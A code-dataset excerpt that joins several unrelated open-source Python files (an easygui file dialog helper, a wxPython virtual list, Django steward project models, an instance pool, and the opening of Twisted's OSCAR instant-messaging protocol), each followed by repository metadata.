current name of the file to be saved). It may also be empty,
or contain a filemask that includes wildcards.
The "filetypes" argument works like the "filetypes" argument to
fileopenbox.
:param str msg: the msg to be displayed.
:param str title: the window title
:param str default: default filename to return
:param object filetypes: filemasks that a user can choose, e.g. " \*.txt"
:return: the name of a file, or None if user chose to cancel
"""
localRoot = Tk()
localRoot.withdraw()
initialbase, initialfile, initialdir, filetypes = fileboxSetup(
default, filetypes)
f = ut.tk_FileDialog.asksaveasfilename(parent=localRoot, title=getFileDialogTitle(msg, title), initialfile=initialfile, initialdir=initialdir, filetypes=filetypes
)
localRoot.destroy()
if not f:
return None
return os.path.normpath(f)
# -------------------------------------------------------------------
#
# fileboxSetup
#
# -------------------------------------------------------------------
def fileboxSetup(default, filetypes):
if not default:
default = os.path.join(".", "*")
initialdir, initialfile = os.path.split(default)
if not initialdir:
initialdir = "."
if not initialfile:
initialfile = "*"
initialbase, initialext = os.path.splitext(initialfile)
initialFileTypeObject = FileTypeObject(initialfile)
allFileTypeObject = FileTypeObject("*")
ALL_filetypes_was_specified = False
if not filetypes:
filetypes = list()
filetypeObjects = list()
for filemask in filetypes:
fto = FileTypeObject(filemask)
if fto.isAll():
ALL_filetypes_was_specified = True # remember this
if fto == initialFileTypeObject:
initialFileTypeObject.add(fto) # add fto to initialFileTypeObject
else:
filetypeObjects.append(fto)
# ------------------------------------------------------------------
# make sure that the list of filetypes includes the ALL FILES type.
# ------------------------------------------------------------------
if ALL_filetypes_was_specified:
pass
elif allFileTypeObject == initialFileTypeObject:
pass
else:
filetypeObjects.insert(0, allFileTypeObject)
# ------------------------------------------------------------------
# Make sure that the list includes the initialFileTypeObject
# in the position in the list that will make it the default.
# This changed between Python version 2.5 and 2.6
# ------------------------------------------------------------------
if len(filetypeObjects) == 0:
filetypeObjects.append(initialFileTypeObject)
if initialFileTypeObject in (filetypeObjects[0], filetypeObjects[-1]):
pass
else:
if ut.runningPython27:
filetypeObjects.append(initialFileTypeObject)
else:
filetypeObjects.insert(0, initialFileTypeObject)
filetypes = [fto.toTuple() for fto in filetypeObjects]
return initialbase, initialfile, initialdir, filetypes
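# Worked example, traced for a non-2.7 interpreter (ut.runningPython27 falsy):
#     fileboxSetup("./docs/*.txt", None)
#     -> ('*', '*.txt', './docs',
#         [('Text files', ('*.txt',)), ('All files', ('*.*',))])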
def __buttonEvent(event=None, buttons=None, virtual_event=None):
"""
Handle an event that is generated by a person interacting with a button. It may be a button press
or a key press.
"""
# TODO: Replace globals with tkinter variables
global boxRoot, __replyButtonText
# Determine window location and save to global
    m = re.match(r"(\d+)x(\d+)([-+]\d+)([-+]\d+)", boxRoot.geometry())
if not m:
raise ValueError(
"failed to parse geometry string: {}".format(boxRoot.geometry()))
width, height, xoffset, yoffset = [int(s) for s in m.groups()]
st.rootWindowPosition = '{0:+g}{1:+g}'.format(xoffset, yoffset)
# print('{0}:{1}:{2}'.format(event, buttons, virtual_event))
if virtual_event == 'cancel':
for button_name, button in list(buttons.items()):
if 'cancel_choice' in button:
__replyButtonText = button['original_text']
__replyButtonText = None
boxRoot.quit()
return
if virtual_event == 'select':
text = event.widget.config('text')[-1]
if not isinstance(text, ut.str):
text = ' '.join(text)
for button_name, button in list(buttons.items()):
if button['clean_text'] == text:
__replyButtonText = button['original_text']
boxRoot.quit()
return
# Hotkeys
if buttons:
for button_name, button in list(buttons.items()):
hotkey_pressed = event.keysym
if event.keysym != event.char: # A special character
hotkey_pressed = '<{}>'.format(event.keysym)
if button['hotkey'] == hotkey_pressed:
__replyButtonText = button_name
boxRoot.quit()
return
print("Event not understood")
def __put_buttons_in_buttonframe(choices, default_choice, cancel_choice):
"""Put the buttons in the buttons frame
"""
global buttonsFrame, cancel_invoke
# TODO: I'm using a dict to hold buttons, but this could all be cleaned up if I subclass Button to hold
# all the event bindings, etc
# TODO: Break __buttonEvent out into three: regular keyboard, default
# select, and cancel select.
unique_choices = ut.uniquify_list_of_strings(choices)
# Create buttons dictionary and Tkinter widgets
buttons = dict()
for button_text, unique_button_text in zip(choices, unique_choices):
this_button = dict()
this_button['original_text'] = button_text
this_button['clean_text'], this_button[
'hotkey'], hotkey_position = ut.parse_hotkey(button_text)
this_button['widget'] = Button(buttonsFrame,
takefocus=1,
text=this_button['clean_text'],
underline=hotkey_position)
this_button['widget'].pack(
expand=YES, side=LEFT, padx='1m', pady='1m', ipadx='2m', ipady='1m')
buttons[unique_button_text] = this_button
# Bind arrows, Enter, Escape
for this_button in list(buttons.values()):
bindArrows(this_button['widget'])
for selectionEvent in st.STANDARD_SELECTION_EVENTS:
this_button['widget'].bind("<{}>".format(selectionEvent),
lambda e: __buttonEvent(
e, buttons, virtual_event='select'),
add=True)
# Assign default and cancel buttons
if cancel_choice in buttons:
buttons[cancel_choice]['cancel_choice'] = True
boxRoot.bind_all('<Escape>', lambda e: __buttonEvent(
e, buttons, virtual_event='cancel'), add=True)
boxRoot.protocol('WM_DELETE_WINDOW', lambda: __buttonEvent(
None, buttons, virtual_event='cancel'))
if default_choice in buttons:
buttons[default_choice]['default_choice'] = True
buttons[default_choice]['widget'].focus_force()
# Bind hotkeys
for hk in [button['hotkey'] for button in list(buttons.values()) if button['hotkey']]:
boxRoot.bind_all(hk, lambda e: __buttonEvent(e, buttons), add=True)
return
| mit | -2,887,402,941,464,055,300 | 34.333632 | 166 | 0.586568 | false | 4.157117 | false | false | false |
ODM2/ODM2StreamingDataLoader | src/wizard/controller/frmVirtualList.py | 1 | 1055 | import wx
class VirtualList(wx.ListCtrl):
def __init__(self, parent, **kwargs):
super(VirtualList, self).__init__(parent,
wx.ID_ANY, style=wx.LC_VIRTUAL | wx.LC_REPORT |\
wx.LC_VRULES | wx.LC_HRULES, **kwargs)
self.data = None
self.columns = []
def setData(self, data):
self.data = data
print data
def RefreshAllItems(self):
if self.data:
if self.DeleteAllItems():
if self.DeleteAllColumns():
self.SetItemCount(len(self.data))
self.RefreshItems(0, len(self.data) - 1)
return True
return False
def OnGetItemText(self, item, col):
return self.data[item][col]
def InsertColumns(self, columnList):
self.columns = columnList
for column in columnList:
super(VirtualList, self).InsertColumn(\
columnList.index(column), column)
def getColumnText(self, index):
return self.columns[index]
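# --- Hedged usage sketch (not part of the original module) ---
# Assumes a running wx.App. Note that RefreshAllItems() deletes all columns,
# so they are inserted afterwards here:
#
#     app = wx.App(False)
#     frame = wx.Frame(None)
#     lst = VirtualList(frame, size=(400, 300))
#     lst.setData([('a', '1'), ('b', '2')])
#     lst.RefreshAllItems()
#     lst.InsertColumns(['Name', 'Value'])
#     frame.Show()
#     app.MainLoop()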
| bsd-3-clause | -944,229,307,867,308,800 | 28.305556 | 60 | 0.554502 | false | 4.089147 | false | false | false |
596acres/django-livinglots-steward | livinglots_steward/models.py | 1 | 2673 | from django.contrib.contenttypes.fields import GenericForeignKey
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.utils.translation import ugettext_lazy as _
from livinglots_organize.models import BaseOrganizer
class OptedInStewardProjectManager(models.Manager):
"""
A manager that only returns StewardProject instances where the group asked
to be included on the map.
"""
def get_queryset(self):
return super(OptedInStewardProjectManager, self).get_queryset().filter(
include_on_map=True,
)
class StewardProjectMixin(models.Model):
objects = models.Manager()
opted_in = OptedInStewardProjectManager()
project_name = models.CharField(_('project name'),
max_length=256,
help_text=_('The name of the project using this lot.'),
)
use = models.ForeignKey('livinglots_lots.Use',
limit_choices_to={'visible': True},
help_text=_('How is the project using the land?'),
verbose_name=_('use'),
)
support_organization = models.CharField(_('support organization'),
max_length=300,
blank=True,
null=True,
help_text=_("What is your project's support organization, if any?"),
)
land_tenure_status = models.CharField(_('land tenure status'),
choices=(
('owned', _('project owns the land')),
('licensed', _('project has a license for the land')),
('lease', _('project has a lease for the land')),
('access', _('project has access to the land')),
('not sure', _("I'm not sure")),
),
default=_('not sure'),
max_length=50,
help_text=_('What is the land tenure status for the project? (This '
'will not be shared publicly.)'),
)
include_on_map = models.BooleanField(_('include on map'),
default=True,
help_text=_('Can we include the project on our map?'),
)
class Meta:
abstract = True
class BaseStewardProject(StewardProjectMixin):
started_here = models.BooleanField(default=False)
content_type = models.ForeignKey(ContentType, related_name='+')
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
class Meta:
abstract = True
class BaseStewardNotification(StewardProjectMixin, BaseOrganizer):
"""
A notification from someone who is part of a stewarding project letting us
know that they are stewards on a given lot.
"""
class Meta:
abstract = True
def __unicode__(self):
return self.name
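# --- Hedged usage sketch (not part of the original module) ---
# Assumes a concrete subclass in the host app, e.g.:
#
#     class StewardProject(BaseStewardProject):
#         pass
#
#     StewardProject.objects.all()   # every project
#     StewardProject.opted_in.all()  # only projects with include_on_map=True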
| bsd-3-clause | -1,274,561,160,493,010,000 | 31.204819 | 79 | 0.640853 | false | 4.2768 | false | false | false |
filipefigcorreia/TracAdaptiveSoftwareArtifacts | AdaptiveArtifacts/model/pool.py | 1 | 3048 | # -*- coding: utf-8 -*-
#
# This software is licensed as described in the file license.txt, which
# you should have received as part of this distribution.
from core import *
class InstancePool(object):
"""
Container for instances of Instance and Entity, that provides
some utility methods to search through them.
"""
def __init__(self):
self._items = []
# Handle special case of the top-most classes of the instantiation chain (Entity and Instance).
# They are not loaded explicitly, and are always available from any pool.
self.add(Entity)
self.add(Instance)
def add(self, instance):
id = instance.get_id()
if not id is None and not self.get_item(id) is None:
# raising an exception is an option. an alternative would be to silently replace the instance with the one
# being loaded, but there may be implications when working with multiple versions of a same instance
raise Exception("Instance with id '%s' already exists in the pool" % (instance.get_id(),))
self._items.append(instance)
def remove(self, item):
self._items.remove(item)
def get_item(self, id):
assert(not id is None)
for item in self._items:
if item.get_id() == id:
return item
return None
def get_items(self, levels=(0,1,2), base_name=None):
result = self._items
if not levels == (0,1,2):
result = [item for item in result if
isinstance(item, Instance) and 0 in levels or
isinstance(item, Entity) and 1 in levels or
item in (Entity, Instance) and 2 in levels]
if not base_name is None:
base = self.get_item(base_name)
result = [item for item in result if isinstance(item, Entity) and len(item.__bases__) > 0 and item.__bases__[0] is base]
return result
def get_instances_of(self, spec_name, direct_instances_only=False):
assert(not spec_name is None)
if direct_instances_only:
return [item for item in self._items if hasattr(item.__class__, 'name') and item.__class__.name == spec_name]
else:
spec_and_childs = self.get_spec_and_child_specs(spec_name)
return [item for item in self._items if item.__class__ in spec_and_childs]
def get_spec_and_child_specs(self, spec_name):
inh_chain = current = [self.get_item(spec_name)]
while True:
childs = [self.get_items(base_name=spec.get_name()) for spec in current]
current = [child for sublist in childs for child in sublist]
if len(current) == 0:
break
inh_chain.extend(current)
return inh_chain
def get_possible_domains(self):
pool = self
possible_domains = {'string':'string'}
possible_domains.update(dict([(i.get_identifier(), i.get_name()) for i in pool.get_items(levels=(1,))]))
return possible_domains
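# --- Hedged usage sketch (not part of the original module) ---
# Entity and Instance come from core (imported above); their construction is
# not shown here, so only the pool bookkeeping is illustrated:
#
#     pool = InstancePool()
#     pool.get_items(levels=(2,))  # -> [Entity, Instance]
#     pool.get_possible_domains()  # -> {'string': 'string', ...}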
| bsd-3-clause | -5,987,743,707,636,190,000 | 40.189189 | 132 | 0.608268 | false | 4.053191 | false | false | false |
TimBizeps/BachelorAP | V503_Millikan Versuch/matrix2latex/src_python/fixEngineeringNotation.py | 3 | 1220 | """This file is part of matrix2latex.
matrix2latex is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
matrix2latex is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with matrix2latex. If not, see <http://www.gnu.org/licenses/>.
"""
import re
def fix(s, table=False):
"""
input: (string) s
output: (string) s
takes any number in s and replaces the format
'8e-08' with '8\e{-08}'
"""
    i = re.search(r'e[-+]\d\d', s)
while i != None:
before = s[0:i.start()]
number = s[i.start()+1:i.start()+4]
after = s[i.end():]
if table:
num = "%(#)+03d" % {'#': int(number)}
else:
num = "%(#)3d" % {'#': int(number)}
s = '%s\\e{%s}%s' % (before, num, after)
        i = re.search(r'e[-+]\d\d', s)
return s
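# Worked examples, traced from the code above:
#     fix('8e-08')              -> '8\e{ -8}'   ("%3d" pads to width 3)
#     fix('8e-08', table=True)  -> '8\e{-08}'   (matches the docstring)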
| gpl-3.0 | 7,896,424,702,390,345,000 | 31.105263 | 68 | 0.62541 | false | 3.485714 | false | false | false |
rohitw1991/frappe | frappe/build.py | 28 | 4438 | # Copyright (c) 2013, Web Notes Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
from frappe.utils.minify import JavascriptMinify
"""
Build the `public` folders and setup languages
"""
import os, sys, frappe, json, shutil
from cssmin import cssmin
def bundle(no_compress, make_copy=False, verbose=False):
"""concat / minify js files"""
# build js files
make_asset_dirs(make_copy=make_copy)
build(no_compress, verbose)
def watch(no_compress):
"""watch and rebuild if necessary"""
import time
build(no_compress=True)
while True:
if files_dirty():
build(no_compress=True)
time.sleep(3)
def make_asset_dirs(make_copy=False):
assets_path = os.path.join(frappe.local.sites_path, "assets")
for dir_path in [
os.path.join(assets_path, 'js'),
os.path.join(assets_path, 'css')]:
if not os.path.exists(dir_path):
os.makedirs(dir_path)
# symlink app/public > assets/app
for app_name in frappe.get_all_apps(True):
pymodule = frappe.get_module(app_name)
source = os.path.join(os.path.abspath(os.path.dirname(pymodule.__file__)), 'public')
target = os.path.join(assets_path, app_name)
if not os.path.exists(target) and os.path.exists(source):
if make_copy:
shutil.copytree(os.path.abspath(source), target)
else:
os.symlink(os.path.abspath(source), target)
def build(no_compress=False, verbose=False):
assets_path = os.path.join(frappe.local.sites_path, "assets")
for target, sources in get_build_maps().iteritems():
pack(os.path.join(assets_path, target), sources, no_compress, verbose)
shutil.copy(os.path.join(os.path.dirname(os.path.abspath(frappe.__file__)), 'data', 'languages.txt'), frappe.local.sites_path)
# reset_app_html()
def get_build_maps():
"""get all build.jsons with absolute paths"""
# framework js and css files
pymodules = [frappe.get_module(app) for app in frappe.get_all_apps(True)]
app_paths = [os.path.dirname(pymodule.__file__) for pymodule in pymodules]
build_maps = {}
for app_path in app_paths:
path = os.path.join(app_path, 'public', 'build.json')
if os.path.exists(path):
with open(path) as f:
try:
for target, sources in json.loads(f.read()).iteritems():
# update app path
source_paths = []
for source in sources:
if isinstance(source, list):
s = frappe.get_pymodule_path(source[0], *source[1].split("/"))
else:
s = os.path.join(app_path, source)
source_paths.append(s)
build_maps[target] = source_paths
except Exception, e:
print path
raise
return build_maps
timestamps = {}
def pack(target, sources, no_compress, verbose):
from cStringIO import StringIO
outtype, outtxt = target.split(".")[-1], ''
jsm = JavascriptMinify()
for f in sources:
suffix = None
if ':' in f: f, suffix = f.split(':')
if not os.path.exists(f) or os.path.isdir(f):
print "did not find " + f
continue
timestamps[f] = os.path.getmtime(f)
try:
with open(f, 'r') as sourcefile:
data = unicode(sourcefile.read(), 'utf-8', errors='ignore')
extn = f.rsplit(".", 1)[1]
if outtype=="js" and extn=="js" and (not no_compress) and suffix!="concat" and (".min." not in f):
tmpin, tmpout = StringIO(data.encode('utf-8')), StringIO()
jsm.minify(tmpin, tmpout)
minified = tmpout.getvalue()
outtxt += unicode(minified or '', 'utf-8').strip('\n') + ';'
if verbose:
print "{0}: {1}k".format(f, int(len(minified) / 1024))
elif outtype=="js" and extn=="html":
# add to frappe.templates
content = data.replace("\n", " ").replace("'", "\'")
outtxt += """frappe.templates["{key}"] = '{content}';\n""".format(\
key=f.rsplit("/", 1)[1][:-5], content=content)
else:
outtxt += ('\n/*\n *\t%s\n */' % f)
outtxt += '\n' + data + '\n'
except Exception, e:
print "--Error in:" + f + "--"
print frappe.get_traceback()
if not no_compress and outtype == 'css':
pass
#outtxt = cssmin(outtxt)
with open(target, 'w') as f:
f.write(outtxt.encode("utf-8"))
print "Wrote %s - %sk" % (target, str(int(os.path.getsize(target)/1024)))
def files_dirty():
for target, sources in get_build_maps().iteritems():
for f in sources:
if ':' in f: f, suffix = f.split(':')
if not os.path.exists(f) or os.path.isdir(f): continue
if os.path.getmtime(f) != timestamps.get(f):
print f + ' dirty'
return True
else:
return False
| mit | -5,458,223,066,992,664,000 | 28.390728 | 127 | 0.64849 | false | 2.921659 | false | false | false |
qitan/icomments | icomments/templatetags/comment.py | 2 | 1218 | # -*- coding:utf8 -*-
from django import template
from django.db.models import Q
from icomments.models import Comments
from icomments.forms import ComForm
register = template.Library()
def show_comment(value):
'''
    Article comments.
'''
comform = ComForm()
    # Fetch comments that have been approved or hidden
comments = Comments.objects.filter(Q(approved=0)|Q(approved=3)).filter(post_id=value)
    # Build the nested comment structure
    dic = {i.id: [i.id, i.parent, [], 0, i] for i in comments}
stack=[]
for c in dic:
i=dic[c]
pid=i[1]
if pid!=0 and dic.get(pid)!=None:
p=dic[pid]
p[2].append(i)
i[3]=p[3]+1
else:
stack.insert(0,i)
result=[]
while stack:
top=stack.pop()
result.append(top[4])
top[2].reverse()
stack.extend(top[2])
comments = result
return {'comments':comments,'comform':comform,'comment_post_id':value}
register.inclusion_tag('icomments/comment.html')(show_comment)
def show_latest_comment():
comments = Comments.objects.filter(Q(parent=0)&Q(approved=0))[:5]
return {'comments':comments}
register.inclusion_tag('icomments/comment_latest.html')(show_latest_comment)
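# --- Hedged template usage (not part of the original module) ---
# The load name follows this file's name (comment.py); the templates are the
# ones referenced in the inclusion_tag registrations above:
#
#     {% load comment %}
#     {% show_comment post.id %}
#     {% show_latest_comment %}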
| gpl-3.0 | -6,502,655,968,941,639,000 | 24.565217 | 89 | 0.614796 | false | 2.962217 | false | false | false |
dharmeshpatel/shoppingcart | shoppingCart/release.py | 1 | 1970 | #!/usr/bin/python
# -*- encoding: utf-8 -*-
################################################################################
#
# Copyright (C) 2010 - 2015 Dharmesh Patel <[email protected]>.
# $Id$
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
################################################################################
name = 'shoppingCart'
version = '1.4.2'
major_version = '1'
description = 'shoppingCart is an open source cart developed in Python to manage carts in e-commerce applications.'
long_description = """
Major Features:
1. Product options support.
2. Multi discount support.
3. Multi tax support(specific to product as well as general taxes).
4. Multi currency support.
5. Tax Exclude and Include total.
6. Shipping method and charge.
"""
classifiers = [
"Development Status :: 5 - Production/Stable",
"License :: OSI Approved :: BSD License",
"Programming Language :: Python"
]
url = 'https://github.com/dharmeshpatel/shoppingcart'
author = 'Dharmesh Patel'
author_email = 'mr[dot]dlpatel[at]gmail[dot]com'
copyright = 'Copyright (c) 2010 - 2015 Dharmesh Patel'
license = 'BSD'
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| bsd-3-clause | 100,771,357,863,046,540 | 40.041667 | 128 | 0.607614 | false | 4.129979 | false | false | false |
classam/threepanel | threepanel/tasks.py | 1 | 5979 | import os
import subprocess
import shlex
from invoke import task, run
from invoke.exceptions import Failure
YOUR_APP_NAME = "threepanel"
HOME_PATH = os.environ['HOME']
DJANGO_PATH = os.path.join(HOME_PATH, 'vagrant_django', YOUR_APP_NAME)
SCRIPTS_PATH = os.path.join(HOME_PATH, 'vagrant_django', 'scripts')
UWSGI_LOG_PATH = os.path.join(HOME_PATH, 'logs', 'uwsgi.log')
UWSGI_SH_PATH = os.path.join(HOME_PATH, 'uwsgi.sh')
UWSGI_PID_PATH = os.path.join(HOME_PATH, 'uwsgi.pid')
def python():
thing = run("python --version")
if str(thing.stdout).startswith("Python 3."):
return "python"
else:
return "python3"
def background(cmd):
subprocess.Popen(shlex.split(cmd))
def multiple(*args):
return " && ".join(args)
@task
def home(command, *args, **kwargs):
""" Run a command from the base django directory """
return run(multiple("cd {}".format(DJANGO_PATH), command), *args, **kwargs)
@task
def test():
""" Run all the tests. """
return dj("test images dashboard comics")
@task
def lint():
""" Run the PEP8 and Pyflakes linters """
return home("pylint *")
@task
def search(stuff):
""" Ack around for stuff """
return home("ack {}".format(stuff))
@task
def dj(command, *args, **kwargs):
""" Run a django manage.py command """
return home("{} manage.py {}".format(python(), command), *args, **kwargs)
@task()
def runserver():
""" Run a django development server """
print("Running server on localhost:8080 (Vagrant Host:18080)")
return dj("runserver 0:8080", pty=True)
@task()
def dev_start():
""" Run a django development server """
return runserver()
@task
def makemigrations():
""" Prep the prepping of the database """
return dj("makemigrations")
@task
def collectstatic():
""" Collect all of the static files from the django codebase
and plop them in the STATIC_ROOT defined in settings.py """
return dj("collectstatic --clear --noinput")
@task
def migrate():
""" Prep the database """
return dj("migrate")
@task
def auth_keys():
""" Do something insecure and terrible """
return run("python3 /home/vagrant/vagrant_django/keys.py > ~/.ssh/authorized_keys")
@task()
def dump():
""" Dump the Postgres DB to a file. """
print("Dumping DB")
run("dos2unix {}/backup_postgres.sh".format(SCRIPTS_PATH))
run("bash {}/backup_postgres.sh".format(SCRIPTS_PATH))
@task()
def restore(filename):
""" Restore the Postgres DB from a file.
hey, past Curtis, does this actually work? be honest
"""
print("Dumping DB")
dump()
print("Destrying DB")
run("dos2unix {}/reset_postgres.sh".format(SCRIPTS_PATH))
run("bash {}/reset_postgres.sh".format(SCRIPTS_PATH))
print("Restoring DB from file: {}".format(filename))
run("dos2unix {}/rebuild_postgres.sh".format(SCRIPTS_PATH))
run("bash {}/rebuild_postgres.sh {}".format(SCRIPTS_PATH, filename), echo=True)
@task()
def clear():
""" Destroy and recreate the database """
print("Resetting db")
dump()
run("dos2unix {}/reset_postgres.sh".format(SCRIPTS_PATH))
run("bash {}/reset_postgres.sh".format(SCRIPTS_PATH))
dj("makemigrations")
dj("migrate --noinput")
#dj("testdata")
@task
def uwsgi():
""" Activate the Python Application Server. """
print("writing logs to {}".format(UWSGI_LOG_PATH))
print("writing pidfile to {}".format(UWSGI_PID_PATH))
background("bash {}/uwsgi.sh".format(SCRIPTS_PATH))
@task
def kill_uwsgi():
    if os.path.exists("{}/uwsgi.pid".format(HOME_PATH)):
        print("Killing UWSGI...")
        result = run("kill `cat {}/uwsgi.pid`".format(HOME_PATH), pty=True)
        print("UWSGI Dead...")
        return result
    else:
        print("UWSGI not running!")
@task
def celery():
""" Activate the task running system. """
print("Activating celery worker.")
background("bash {}/celery.sh".format(SCRIPTS_PATH))
@task
def kill_celery():
    if os.path.exists("{}/celery.pid".format(HOME_PATH)):
        print("Killing Celery...")
        result = run("kill `cat {}/celery.pid`".format(HOME_PATH), pty=True)
        print("Celery Dead...")
        return result
    else:
        print("Celery not running!")
@task
def postgres():
print("Starting Postgres...")
return run("sudo service postgresql start")
@task
def kill_postgres():
print("Killing Postgres...")
return run("sudo service postgresql stop")
@task
def nginx():
print("Starting Nginx...")
return run("sudo service nginx start")
@task
def kill_nginx():
print("Killing Nginx...")
return run("sudo service nginx stop")
@task
def redis():
print("Starting Redis...")
return run("sudo service redis-server start")
@task
def kill_redis():
print("Killing Redis...")
return run("sudo service redis-server stop")
@task
def restart_syslog():
print("Restarting Syslog...")
return run("sudo service rsyslog restart")
@task
def remote_syslog():
""" Activate remote_syslog to pull celery logs to papertrail. """
print("Activating remote_syslog.")
background("bash {}/remote_syslog.sh".format(SCRIPTS_PATH))
@task
def kill_remote_syslog():
    if os.path.exists("{}/remote_syslog.pid".format(HOME_PATH)):
        print("Killing Remote Syslog...")
        result = run("kill `cat {}/remote_syslog.pid`".format(HOME_PATH), pty=True)
        print("Remote Syslog Dead...")
        return result
    else:
        print("Remote Syslog not running!")
@task
def prod_start():
""" Start all of the services in the production stack"""
collectstatic()
postgres()
uwsgi()
celery()
nginx()
redis()
restart_syslog()
return remote_syslog()
@task
def prod_stop():
""" Stop all of the services in the production stack"""
kill_postgres()
kill_uwsgi()
kill_celery()
kill_nginx()
kill_remote_syslog()
return kill_redis()
@task
def prod_restart():
""" Restart all of the services in the production stack """
prod_stop()
return prod_start()
| agpl-3.0 | 6,199,138,148,214,750,000 | 25.223684 | 87 | 0.641913 | false | 3.468097 | false | false | false |
Vaelor/python-mattermost-driver | docs/mmDriverTokenAuthExample.py | 1 | 3713 |
# A simple example to retrieve all users for a team while using a _token_
# from the .netrc file instead of a password (as requests assumes by default)
import logging
import requests
import netrc
from mattermostdriver import Driver
logging.basicConfig( format='%(levelname)s - %(name)s - %(asctime)s - %(message)s' )
logger = logging.getLogger( 'MattermostManager' )
logger.setLevel( logging.INFO )
# requests overrides the simple authentication token header if it finds the entry in
# the ~/.netrc file. Since we want to use ~/.netrc to retrieve the _token_, we need
# to provide our own Authenticator class:
class TokenAuth( requests.auth.AuthBase ) :
def __call__( self, r ) :
# Implement my authentication
mmHost = 'mattermost.host.in.netrc'
(login, account, password) = netrc.netrc().authenticators( mmHost )
r.headers[ 'Authorization' ] = "Bearer %s" % password
return r
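# (Added note) requests calls the TokenAuth instance once per request, so the
# token is re-read from ~/.netrc every time. A minimal manual use, outside the
# Driver, would be:
#
#     requests.get('https://mattermost.host.in.netrc/api/v4/users/me',
#                  auth=TokenAuth())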
class MattermostManager( object ) :
def __init__( self ) :
# Get the _token_ (as "password") from the ~/.netrc file.
# the corresponding line in the file should look like:
# <mattermost.host.in.netrc> foo foo <long-string-of-token>
# The "login" and "account" (both set to "foo" in the example are ignored)
mmHost = 'mattermost.host.in.netrc'
(login, account, password) = netrc.netrc().authenticators( mmHost )
logger.debug( "Going to set up driver for connection to %s " % (mmHost,) )
self.mmDriver = Driver( options={
'url' : mmHost,
'scheme' : 'https',
'port' : 443,
'auth' : TokenAuth, # use the new Authenticator class defined above
} )
self.mmDriver.users.get_user( user_id='me' )
def getTeamMembers( self, teamName ) :
# for restricted teams, we need to get the ID first, and
# for this, we need to have the "name" (as in the URL), not
# the "display name", as shown in the GUIs:
team0 = self.mmDriver.teams.get_team_by_name( teamName )
logger.debug( 'team by name %s : %s' % (teamName, team0) )
teamId = team0[ 'id' ]
team = self.mmDriver.teams.check_team_exists( teamName )
logger.debug( 'team %s - exists: %s' % (teamName, team[ 'exists' ]) )
if not team[ 'exists' ] :
logger.error( 'no team with name %s found' % teamName )
return
logger.debug( 'found team %s: %s' % (teamName, self.mmDriver.teams.get_team( teamId )) )
users = self._getAllUsersForTeam( teamId )
logger.debug( 'found %s users for team "%s"' % (len( users ), teamName) )
return users
def _getAllUsersForTeam( self, teamId ) :
# get all users for a team
# with the max of 200 per page, we need to iterate a bit over the pages
users = [ ]
pgNo = 0
teamUsers = self.mmDriver.users.get_users( params={ 'in_team' : teamId,
'page' : str( pgNo ),
'per_page' : 200,
} )
while teamUsers :
users += teamUsers
pgNo += 1
teamUsers = self.mmDriver.users.get_users( params={ 'in_team' : teamId,
'per_page' : 200,
'page' : str( pgNo ),
} )
return users
if __name__ == '__main__' :
mmM = MattermostManager()
mmM.getTeamMembers( 'myTeam' )
| mit | 597,084,315,841,375 | 38.084211 | 96 | 0.543496 | false | 3.916667 | false | false | false |
MrLoick/python-for-android | python-modules/twisted/twisted/words/protocols/oscar.py | 53 | 43256 | # -*- test-case-name: twisted.words.test -*-
# Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
An implementation of the OSCAR protocol, which AIM and ICQ use to communicate.
Maintainer: Paul Swartz
"""
import struct
import string
import socket
import random
import types
import re
from twisted.internet import reactor, defer, protocol
from twisted.python import log
from twisted.python.hashlib import md5
def logPacketData(data):
lines = len(data)/16
if lines*16 != len(data): lines=lines+1
for i in range(lines):
d = tuple(data[16*i:16*i+16])
hex = map(lambda x: "%02X"%ord(x),d)
text = map(lambda x: (len(repr(x))>3 and '.') or x, d)
log.msg(' '.join(hex)+ ' '*3*(16-len(d)) +''.join(text))
log.msg('')
def SNAC(fam,sub,id,data,flags=[0,0]):
header="!HHBBL"
head=struct.pack(header,fam,sub,
flags[0],flags[1],
id)
return head+str(data)
def readSNAC(data):
header="!HHBBL"
head=list(struct.unpack(header,data[:10]))
return head+[data[10:]]
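# (Added note) A SNAC header is 10 bytes: 16-bit family and subtype, two
# single-byte flags, and a 32-bit request ID, so
# readSNAC(SNAC(4, 6, 1, 'x')) returns [4, 6, 0, 0, 1, 'x'].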
def TLV(type,value):
header="!HH"
head=struct.pack(header,type,len(value))
return head+str(value)
def readTLVs(data,count=None):
header="!HH"
dict={}
while data and len(dict)!=count:
head=struct.unpack(header,data[:4])
dict[head[0]]=data[4:4+head[1]]
data=data[4+head[1]:]
if not count:
return dict
return dict,data
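# (Added note) TLVs are 16-bit type / 16-bit length / value triples, e.g.
# TLV(1, 'abc') == '\x00\x01\x00\x03abc' and
# readTLVs('\x00\x01\x00\x03abc') == {1: 'abc'}.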
def encryptPasswordMD5(password,key):
m=md5()
m.update(key)
m.update(md5(password).digest())
m.update("AOL Instant Messenger (SM)")
return m.digest()
def encryptPasswordICQ(password):
key=[0xF3,0x26,0x81,0xC4,0x39,0x86,0xDB,0x92,0x71,0xA3,0xB9,0xE6,0x53,0x7A,0x95,0x7C]
bytes=map(ord,password)
r=""
for i in range(len(bytes)):
r=r+chr(bytes[i]^key[i%len(key)])
return r
def dehtml(text):
text=string.replace(text,"<br>","\n")
text=string.replace(text,"<BR>","\n")
text=string.replace(text,"<Br>","\n") # XXX make this a regexp
text=string.replace(text,"<bR>","\n")
text=re.sub('<.*?>','',text)
text=string.replace(text,'>','>')
text=string.replace(text,'<','<')
text=string.replace(text,' ',' ')
text=string.replace(text,'"','"')
